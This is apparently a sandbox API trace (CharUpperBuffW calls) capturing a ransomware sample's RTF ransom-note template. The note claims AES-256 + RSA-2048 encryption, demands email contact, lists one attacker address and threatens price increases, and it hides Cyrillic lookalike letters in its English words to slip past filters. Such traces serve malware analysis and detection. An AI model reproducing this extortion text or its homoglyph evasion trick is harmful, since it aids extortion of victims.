ALL Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S W\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D WITH STR\\F1\\LANG1049\\'EE\\F0\\LANG1033 NG CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LG\\F1\\LANG1049\\'EE\\F0\\LANG1033 RITHM \\F1\\LANG1049\\'C0\\'C5\\F0\\LANG1033 S-256 + RS\\F1\\LANG1049\\'C0\\F0\\LANG1033 -2048.\\PAR\r\nPL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 B\\F1\\LANG1049\\'E5\\F0\\LANG1033 SUR\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T BR\\F1\\LANG1049\\'EE\\F0\\LANG1033 K\\F1\\LANG1049\\'E5\\F0\\LANG1033 N \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U C\\F1\\LANG1049\\'E0\\F0\\LANG1033 N R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 M T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E0\\F0\\LANG1033 Y.\\PAR\r\n\\PAR\r\nIF Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 W\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT T\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 US T\\F1\\LANG1049\\'EE\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 ILS:\\PAR\r\n\\B\\FS28 [EML1]\\PAR\r\n[EML2]\\PAR\r\n[EML3]\\PAR\r\n\\B0\\FS24 IN SUBJ\\F1\\LANG1049\\'E5\\F0\\LANG1033 CT LIN\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 UR ID: \\B\\FS28 [KID]\\FS24\\PAR\r\n\\PAR\r\n\\CF1 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT!\\CF0 PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR M\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E0\\F0\\LANG1033 G\\F1\\LANG1049\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'EE\\F0\\LANG1033 F \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR 3 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL \\F1\\LANG1049\\'E0\\F0\\LANG1033 DDR\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E5\\F0\\LANG1033 S. THIS IS R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT B\\F1\\LANG1049\\'E5\\F0\\LANG1033 C\\F1\\LANG1049\\'E0\\F0\\LANG1033 US\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'EE\\F0\\LANG1033 F D\\F1\\LANG1049\\'E5\\F0\\LANG1033 LIV\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PR\\F1\\LANG1049\\'EE\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 MS \\F1\\LANG1049\\'EE\\F0\\LANG1033 F S\\F1\\LANG1049\\'EE\\F0\\LANG1033 M\\F1\\LANG1049\\'E5\\F0\\LANG1033 M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 RVI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\CF1 IMPORTANT!\\CF0 IF YOU HAVEN'T RECEIVED A RESPONSE FROM US WITHIN 24 HOURS, PLEASE TRY TO USE A DIFFERENT EMAIL SERVICE\\F1\\LANG1049 (\\F0\\LANG1033 GMAIL, YAHOO, AOL, ETC\\F1\\LANG1049 )\\F0\\LANG1033 .\\PAR\r\n\\CF1 IMPORTANT!\\CF0 PLEASE CHECK YOUR SPAM FOLDER EACH TIME YOU WAIT FOR OUR RESPONSE! IF YOU FIND OUR EMAIL IN THE SPAM FOLDER PLEASE MOVE IT TO YOUR INBOX.\\PAR\r\n\\CF1 IMPORTANT! \\CF0 WE ARE ALWAYS IN TOUCH AND READY TO HELP YOU AS SOON AS POSSIBLE!\\PAR\r\n\\PAR\r\n\\B0\\F1\\LANG1049\\'C0\\F0\\LANG1033 TT\\F1\\LANG1049\\'E0\\F0\\LANG1033 CH UP T\\F1\\LANG1049\\'EE\\F0\\LANG1033 3 SM\\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'E5\\F0\\LANG1033 NCR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R FR\\F1\\LANG1049\\'E5\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\'F1\\F0\\LANG1033 RYPTION. PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND US SH\\F1\\LANG1049\\'EE\\F0\\LANG1033 ULD N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NT\\F1\\LANG1049\\'E0\\F0\\LANG1033 IN \\F1\\LANG1049\\'E0\\F0\\LANG1033 N\\F1\\LANG1049\\'F3\\F0\\LANG1033 V\\F1\\LANG1049\\'E0\\F0\\LANG1033 LU\\F1\\LANG1049\\'E0\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 INF\\F1\\LANG1049\\'EE\\F0\\LANG1033 RM\\F1\\LANG1049\\'E0\\F0\\LANG1033 TI\\F1\\LANG1049\\'EE\\F0\\LANG1033 N.\\F1\\LANG1049 \\F0\\LANG1033 W\\F1\\LANG1049\\'E5\\F0\\LANG1033 WILL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FILES IN \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SP\\F1\\LANG1049\\'EE\\F0\\LANG1033 NS\\F1\\LANG1049\\'E5\\F0\\LANG1033 F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NFID\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 .\\PAR\r\nOF COURSE YOU WILL RECEIVE ALL THE NECESSARY INSTRUCTIONS H\\F1\\LANG1049\\'EE\\F0\\LANG1033 W T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\PAR\r\n\\CF1\\B IMPORTANT!\\PAR\r\n\\CF0 PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE THAT WE ARE PROFESSIONALS AND JUST DOING OUR JOB!\\PAR\r\nPLEASE D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T W\\F1\\LANG1049\\'E0\\F0\\LANG1033 ST\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 TIM\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T TR\\F1\\LANG1049\\'F3\\F0\\LANG1033 TO D\\F1\\LANG1049\\'E5\\'F1\\'E5\\F0\\LANG1033 IVE US - IT WILL R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SULT \\F1\\LANG1049\\'EE\\F0\\LANG1033 NLY PRI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 INCR\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 !\\PAR\r\nW\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ALW\\F1\\LANG1049\\'E0\\'F3\\F0\\LANG1033 S \\F1\\LANG1049\\'EE\\F0\\LANG1033 P\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'E5\\F0\\LANG1033 D F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R DI\\F1\\LANG1049\\'E0\\F0\\LANG1033 L\\F1\\LANG1049\\'EE\\F0\\LANG1033 G \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 DY T\\F1\\LANG1049\\'EE\\F0\\LANG1033 H\\F1\\LANG1049\\'E5\\F0\\LANG1033 LP \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U.\\PAR\r\n\\CF2\\FS28 [RDM_STR]\\CF0\\F1\\FS32\\LANG1049\\PAR\r\n}\r\n") returned 0x1c17 [0064.342] CharUpperBuffW (in: lpsz="[EML1]", cchLength=0x6 | out: lpsz="[EML1]") returned 0x6 [0064.342] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\n[EML2]\\par\r\n[EML3]\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 [KID]\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 [RDM_STR]\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchLength=0x1c28 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\NOUICOMPAT\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET0 CALIBRI;}{\\F1\\FNIL\\FCHARSET204 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;\\RED255\\GREEN255\\BLUE255;}\r\n{\\*\\GENERATOR RICHED20 10.0.15063}\\VIEWKIND4\\UC1 \r\n\\PARD\\RI-74\\SL240\\SLMULT1\\QC\\TX8378\\B\\F0\\FS24\\LANG1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\PAR\r\n\r\n\\PARD\\RI-74\\SL240\\SLMULT1\\TX8378\\PAR\r\n\\B0 ALL Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S W\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D WITH STR\\F1\\LANG1049\\'EE\\F0\\LANG1033 NG CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LG\\F1\\LANG1049\\'EE\\F0\\LANG1033 RITHM \\F1\\LANG1049\\'C0\\'C5\\F0\\LANG1033 S-256 + RS\\F1\\LANG1049\\'C0\\F0\\LANG1033 -2048.\\PAR\r\nPL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 B\\F1\\LANG1049\\'E5\\F0\\LANG1033 SUR\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T BR\\F1\\LANG1049\\'EE\\F0\\LANG1033 K\\F1\\LANG1049\\'E5\\F0\\LANG1033 N \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U C\\F1\\LANG1049\\'E0\\F0\\LANG1033 N R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 M T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E0\\F0\\LANG1033 Y.\\PAR\r\n\\PAR\r\nIF Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 W\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT T\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 US T\\F1\\LANG1049\\'EE\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 ILS:\\PAR\r\n\\B\\FS28 BOBGREEN85@CRIPTEXT.COM\\PAR\r\n[EML2]\\PAR\r\n[EML3]\\PAR\r\n\\B0\\FS24 IN SUBJ\\F1\\LANG1049\\'E5\\F0\\LANG1033 CT LIN\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 UR ID: \\B\\FS28 [KID]\\FS24\\PAR\r\n\\PAR\r\n\\CF1 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT!\\CF0 